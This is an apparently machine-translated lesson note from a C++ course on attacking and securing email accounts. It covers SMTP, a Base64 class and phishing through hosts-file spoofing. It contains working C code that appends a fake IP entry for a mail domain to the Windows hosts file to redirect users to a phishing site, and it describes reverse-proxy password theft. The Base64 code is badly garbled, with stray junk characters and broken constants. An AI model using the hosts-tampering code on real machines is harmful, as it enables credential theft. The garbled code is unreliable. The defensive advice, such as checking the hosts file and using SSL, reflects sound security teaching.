Preach Wisdom Podcast C + + Public Lesson notes--The crack of mailbox account and the security of mailbox

First, SMTP protocol

SMTP (Simplemail Transfer Protocol) is a Simple Mail Transfer protocol.

The SMTP protocol belongs to the TCP/IP protocol family and is able to send e-mail to the recipient's server via the server specified by the SMTP protocol.

SmtpServer is the sending mail server that follows the SMTP protocol, which is used to send or relay e-mail messages.

SMTP uses the reliable transport data service provided by TCP to transfer mail messages from the sender's mail server to the recipient's mail server.

As with most application layer protocols, SMTP also has two ports: client executed on sender's mail server and server side executed on recipient's mail server. Both the client and server side of SMTP are executed on each mail server at the same time.

When a mail server sends a mail message to another mail server, it is executed as an SMTP customer.

Second, Base64 code

Base64 is one of the most common encoding methods used to transmit 8Bit bytes of code on the network, see rfc2045~rfc2049, which has a specific MIME specification.

BASE64 encoding can be used for username and password authentication in SMTP as well as for message attachment encoding. The use of BASE64 encoding is not readable, that is, the encoded data will not be directly visible to the human eye.

Base64.h:interface for the CBase64 class./////////////////////////////////////////////////////////////////////// /#if!defined (afx_base64_h__6a4b8840_b49d_48b8_9b49_a6ee998623dc__included_) #define Afx_base64_h__6a4b8840_b49d_ 48b8_9b49_a6ee998623dc__included_#include <string> #include <stdio.h> #include <string.h>using    Namespace Std;class cbase64{public:cbase64 ();    Virtual ~cbase64 (); virtual int Decode (const char* szdecoding, char* szoutput);//base64 to asciivirtual int Encode (const char* szencoding, in    T nSize, char* szoutput);//ascii to base64protected:unsigned Char encodebuf[3000];    Char base2chr (char n) {n &= 0x3F;        return m_sbase64alphabet[(int) n];        if (n <) return (char) (n + ' A ');        else if (n < a) return (char) (n-26 + ' a ');        else if (n < a) return (char) (n-52 + ' 0 ');        else if (n = =) return ' + '; else reTurn '/'; } unsigned char chr2base (char c) {if (c >= ' A ' && C <= ' Z ') return (unsigned C        HAR) (C-' A ');        else if (c >= ' a ' && c <= ' z ') return (unsigned char) (C-' a ' + 26);        else if (c >= ' 0 ' && C <= ' 9 ') return (unsigned char) (C-' 0 ' + 52);        else if (c = = ' + ') return 62;        else if (c = = '/') return 63;  else return 64; N^p ' wv7{} static std::string m_sbase64alphabet;};/ /modify end#endif//!defined (AFX_BASE64_H__6A4B8840_B49D_48B8_9B49_A6EE998623DC__INCLUDED_)

Base64.cpp:implementation of the CBase64 class. #define _crt_secure_no_warnings#include "Base64.h"//The 7-bit Alphabe T used to encode binary information//////////////////////////////////////////////////////////////////////// Construction/destruction//////////////////////////////////////////////////////////////////////cbase64::cbase64 () {memset (encodebuf, 0, sizeof (ENCODEBUF));} Cbase64::~cbase64 () {}std::string Cbase64::m_sbase64alphabet (" abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789+/"); int CBase64::D ecode (const char* szdecoding,    char* szoutput)//base64 to ascii{unsigned char * p = (unsigned char *) szoutput;    int i, n = strlen (szdecoding);    unsigned char c, t;        for (i = 0; i < n; i++) {if (*szdecoding = = ' = ') break;            do {if (*szdecoding) c = chr2base (*szdecoding++);  else C = 65;  WV7{4.=AJX} while (c = = 64); Lx9}n^p ' wv7{#,hg; X355H if (c = =) break;            Switch (i% 4) {case 0:t = c << 2;        Break Case 1: *p++ = (unsigned char) (t |            (c >> 4));            t = (unsigned char) (c << 4);        Break Case 2: *p++ = (unsigned char) (t |            (c >> 2));            t = (unsigned char) (c << 6);        Break            Case 3: *p++ = (unsigned char) (t | c);        Break    }}//(char *) szoutput; Return ((char*) p-szoutput);} int Cbase64::encode (const char* szencoding, int nSize, char* szoutput)//ascii to base64{std::string soutput = String ("    ");    int nIndex = 0;    unsigned char ctemp1[4096];    memset (encodebuf, 0, sizeof (ENCODEBUF));    if (!szencoding) return 0;    /*else (unsigned char*) szencoding;*/memcpy (Encodebuf, szencoding, nSize);    unsigned char *ctemp = encodebuf;    unsigned char t; for (Nindex = 0; NIndex < nSize;             nindex++) {switch (nIndex% 3) {case 0:soutput + = BASE2CHR (*ctemp >> 2);            t = (*ctemp << 4) & 0x3F;            ctemp++;        Break Case 1:soutput + = BASE2CHR (T |            (*ctemp >> 4));            t = (*ctemp << 2) & 0x3F;            ctemp++;        Break Case 2:soutput + = BASE2CHR (T |            (*ctemp >> 6));            Soutput + = BASE2CHR (*ctemp & 0x3F);            ctemp++;        Break        }} if (nSize% = 3 = 0) {soutput + = BASE2CHR (t);        if (nSize% 3 = = 1) soutput + = ' = ';    Soutput + = ' = ';    }strcpy (Szoutput, Soutput.c_str ()); return Soutput.length ();}

#include <stdio.h> #include <string.h> #include "Base64.h" int main01 ()//This is the code that converts ASCII to base64 {CBase64 Base;//creates an instance of the CBase64 class, also called an object, char base64[100] = {0};char ascii[100] = "18513105526"; base. Encode (ASCII, strlen (ASCII), base64);p rintf ("%s\n", base64); return 0;} int main ()//This is the code that converts base64 to ASCII {CBase64 base;//creates an instance of the CBase64 class, also called an object. Char base64[100] = "Ugfzc3dvcmq6"; char ascii[100] = {0};base. Decode (base64, ASCII);//Convert the string base64 to ASCII, the result is placed in the ASCII string printf ("%s\n", ASCII); return 0;}

Third, the crack and protection of the mailbox account

1) hosts cheat and phishing sites

Fishing site implementation and how to prevent

A phishing site is a fake site that looks very similar to the real site

The fishing site intercepts the information that the user has entered.

Fishing site How to allow users to actively login to the fishing site?

Hosts spoofing, under the Windows System folder has a Hosts file, this file is stored inside the IP and domain name of the corresponding relationship

I just need to add a line to the hosts file. For example, to let users log in to mail.wo.cn this site when they actively login to the fishing site

In the Hosts file

123.57.211.212 mail.wo.cn

how to Prevent, be sure to check your hosts file regularly to see if there are unknown IP and other domain name information,

Do not take the unauthorized implementation of the various programs, because some programs are malicious changes to your Hosts file

#include <Windows.h> #include <stdio.h> #include <string.h> #pragma warning (disable:4996)//Shielded VS 4996 this error message int sethosts (const char *IP, const char *domain)//change Hosts file {char s[100] = {0}; Getsystemdirectorya (S, sizeof (s));//Get Windows System installation folder Char path[1024] = {0};sprintf (path, "%s\\%s", S, "\\drivers\\etc \\hosts "); char content[1024] = {0};sprintf (content," \n%s%s ", IP, domain); File *p = fopen (Path, "a");//Open the Hosts file in an appended way if (p) {fputs (content, p);//writes the corresponding relationship of IP and domain name to the Hosts file fclose (p); return 0;// Failed to write to the hosts file on behalf of the successful}return-1;//}int main () {int rc = sethosts ("123.57.211.212", "smtp.wo.cn");p rintf ("rc =%d\n", RC); return 0;}

2) Reverse Proxy

How to steal password through a reverse proxy. and how to prevent

With a reverse proxy, you can almost seamlessly steal a lot of information from the client.

SSL is common today's SMTP. So it's best to use SSL to connect to the mail server. Because SSL is intercepted by a reverse proxy, the cost of deciphering the message can be very large.

For the security of the mailbox, please students must use the SSL-enabled mail server. All SSL messages are encrypted.

Remember must not be unauthorized implementation of a variety of unsolicited procedures, and some programs are by changing the hosts file to achieve phishing or reverse proxy malicious attempts.

Once the password of the mailbox is compromised, it can sometimes be very costly. Because a lot of scammers will use your mailbox to send mail. At the same time, if your mailbox password and your other password are the same. It's even more dangerous.

Preach Wisdom Podcast C + + Public Lesson notes--The crack of mailbox account and the security of mailbox